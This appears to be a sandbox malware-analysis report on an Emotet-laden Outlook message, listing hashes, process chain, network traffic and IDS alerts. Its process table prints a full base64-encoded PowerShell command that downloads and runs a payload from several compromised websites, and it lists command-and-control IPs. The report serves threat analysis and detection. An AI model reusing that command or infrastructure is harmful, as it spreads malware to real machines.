File name: | Re Foto.msg |
Full analysis: | https://app.any.run/tasks/f75ba81d-0a0a-4618-99fc-27ea1a7bbd7a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | May 15, 2019, 07:43:17 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | 7E6C0CE6BD4F842C480A8D4B3752FFC0 |
SHA1: | B50F37EBF79BD1D723D5E0350CB4B4947F949291 |
SHA256: | 1DF70C524A0ED79664B96C0D266ED7892190CE27793696898C9A2A9493B82758 |
SSDEEP: | 3072:BtQtimi1Y77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qzMaJSWI+zy0WD7TLv:Etf77HUUUUUUUUUUUUUUUUUUUT52Vg14 |
.msg | | | Outlook Message (41.3) |
---|---|---|
.oft | | | Outlook Form Template (24.1) |
.doc | | | Microsoft Word document (18.6) |
.doc | | | Microsoft Word document (old ver.) (11) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2464 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Re Foto.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
1556 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\9GVZ1362\DAT 3097 5294397579.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
272 | powershell -enc JABVADYAOAA0ADMAOAAxADEAPQAnAEgAMgAxADAAOAA5ACcAOwAkAEMANgA1ADYAMAA2AF8AIAA9ACAAJwA5ADkANwAnADsAJABVADgAMwAxADIANgA9ACcAVABfADEAOQA1ADMANgA0ACcAOwAkAEkAMgAzADEAOAAyADIANwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAQwA2ADUANgAwADYAXwArACcALgBlAHgAZQAnADsAJAByADEANAA4ADEAMwA2AD0AJwBCADcAOAA5ADAAMAAwACcAOwAkAHEANgAwADQANgBfADUANwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBFAHQALgBXAEUAYABCAGAAYwBMAGkAZQBuAHQAOwAkAEcAMAAyADIAOQA0ADcANgA9ACcAaAB0AHQAcABzADoALwAvAHQAZQBjAG4AbwBsAG8AZwBpAGEAbwBmAGkAYwBpAGEAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AYgByADgAMwAvAEAAaAB0AHQAcAA6AC8ALwBlAHYAYQBtAG8AdABlAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbAAwADcAYgBwADgANAA4ADUALwBAAGgAdAB0AHAAOgAvAC8AdABlAHIAbQBpAG4AYQBsAC0AaABlAGEAdgBlAG4ALgBjAG8AbQAvADIAMAAwADYALwB3ADUAMQB6ADgANwAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGgAdQB6AHUAcgB1AG4AawBhAGwAYgBpAC4AbgBlAHQALwB3AHAALQBhAGQAbQBpAG4ALwAwAG0AaAA0ADcANQAvAEAAaAB0AHQAcABzADoALwAvAHIAZQBnAGkAZwBvAHMAYwBvAHIAaQBuAGcALgBjAG8AbQAvADcAYgAwAG8AZQB3AGUALwAzADIAZgBmAGQAMwA5AC8AJwAuAHMAUABMAEkAVAAoACcAQAAnACkAOwAkAEoANQA3ADkANQBfAD0AJwB1ADMAOQBfADYANgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwA5ADUAXwAzADUAOQA1ACAAaQBuACAAJABHADAAMgAyADkANAA3ADYAKQB7AHQAcgB5AHsAJABxADYAMAA0ADYAXwA1ADcALgBEAE8AVwBuAEwAbwBBAEQAZgBpAEwAZQAoACQASwA5ADUAXwAzADUAOQA1ACwAIAAkAEkAMgAzADEAOAAyADIANwApADsAJABJADYAMAA4ADcAMQA9ACcAdwA5ADIAOAAzADIAXwA3ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQBtACcAKQAgACQASQAyADMAMQA4ADIAMgA3ACkALgBMAGUAbgBHAFQASAAgAC0AZwBlACAAMwA5ADcAOQA5ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAMgAzADEAOAAyADIANwA7ACQAQgAwADEAOAA0ADEAPQAnAE4ANQA2ADYAMQA1ACcAOwBiAHIAZQBhAGsAOwAkAFIAXwA2ADgAMgAwADcAMAA9ACcAQQAwADgANAAyAF8AMwA0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAMAA2ADcANwA4ADMAPQAnAEsAMQAzADgANQA3ADcAJwA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2768 | "C:\Users\admin\997.exe" | C:\Users\admin\997.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3568 | --d3f25675 | C:\Users\admin\997.exe | 997.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2888 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 997.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Exit code: 0 Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3868 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Connection Manager Profile ikstaller Version: 7.02.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR3FBC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF578BE3C4A8B4CB05.TMP | — | |
MD5:— | SHA256:— | |||
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\9GVZ1362\DAT 3097 5294397579 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
1556 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5910.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1556 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2BC7AAD8-7FF7-4A0B-92AA-4ADEFB415A48.0\635928D0.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_E280894059F33D4C8E510B3E56BFC22C.dat | xml | |
MD5:EEAA832C12F20DE6AAAA9C7B77626E72 | SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 | |||
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:592BAC209B7B9E08047A5E838FCB34B2 | SHA256:7052C50ACF918A560D51566D1AF2FD7F4D7370C09F124FC1B39932567018422D | |||
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_480D263568812B46BE6E1A68B77A76BF.dat | xml | |
MD5:B21ED3BD946332FF6EBC41A87776C6BB | SHA256:B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4 | |||
2464 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\9GVZ1362\DAT 3097 5294397579.doc | document | |
MD5:B35AB66416E7A74FF492A352097942A4 | SHA256:A69AD422C2EE9395EBA421651C5D1D72CB838078DC88071D88CF0268EDF0D62B | |||
1556 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:A1DFA4EA790582C8FAD78D250AE066BB | SHA256:E5A872916ADB4B94EB2B1DBD6115B0D7C39232C034D700F420839406D58AEDE3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
3868 | soundser.exe | POST | — | 187.242.204.142:80 | http://187.242.204.142/badge/ | MX | — | — | malicious |
3868 | soundser.exe | POST | — | 191.97.116.232:443 | http://191.97.116.232:443/balloon/sess/ringin/merge/ | AR | — | — | malicious |
3868 | soundser.exe | POST | 200 | 61.92.159.208:8080 | http://61.92.159.208:8080/add/acquire/ | HK | binary | 101 Kb | malicious |
3868 | soundser.exe | POST | 200 | 61.92.159.208:8080 | http://61.92.159.208:8080/codec/guids/ringin/merge/ | HK | binary | 99.6 Kb | malicious |
3868 | soundser.exe | POST | — | 186.121.223.131:80 | http://186.121.223.131/scripts/scripts/ | BO | — | — | malicious |
3868 | soundser.exe | POST | 200 | 64.87.26.16:443 | http://64.87.26.16:443/loadan/ | US | binary | 148 b | malicious |
3868 | soundser.exe | POST | 200 | 64.87.26.16:443 | http://64.87.26.16:443/iplk/walk/ringin/merge/ | US | binary | 721 Kb | malicious |
3868 | soundser.exe | POST | 200 | 61.92.159.208:8080 | http://61.92.159.208:8080/scripts/ | HK | binary | 101 Kb | malicious |
3868 | soundser.exe | GET | 200 | 61.92.159.208:8080 | http://61.92.159.208:8080/whoami.php | HK | text | 11 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3868 | soundser.exe | 191.97.116.232:443 | — | FEROGLIO JULIA ELENA | AR | malicious |
— | — | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
272 | powershell.exe | 104.28.7.23:443 | tecnologiaoficial.com | Cloudflare Inc | US | shared |
3868 | soundser.exe | 187.242.204.142:80 | — | Mega Cable, S.A. de C.V. | MX | malicious |
3868 | soundser.exe | 186.121.223.131:80 | — | AXS Bolivia S. A. | BO | malicious |
3868 | soundser.exe | 217.92.171.167:53 | — | Deutsche Telekom AG | DE | malicious |
3868 | soundser.exe | 64.87.26.16:443 | — | American Internet Services, LLC. | US | malicious |
3868 | soundser.exe | 66.96.147.100:465 | imap.ipage.com | The Endurance International Group, Inc. | US | unknown |
3868 | soundser.exe | 212.227.17.190:587 | mail.gmx.net | 1&1 Internet SE | DE | unknown |
3868 | soundser.exe | 212.227.15.183:25 | smtp.1und1.de | 1&1 Internet SE | DE | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
tecnologiaoficial.com |
| malicious |
dns.msftncsi.com |
| shared |
imap.ipage.com |
| shared |
imap.asenza.pl |
| unknown |
alfa3059.alfahosting-server.de |
| unknown |
pop.1und1.de |
| shared |
mail.nbkcargo.com |
| malicious |
pop.vodafonemail.de |
| unknown |
mail.gmx.net |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3868 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3868 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3868 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3868 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3868 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3868 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3868 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3868 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3868 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3868 | soundser.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |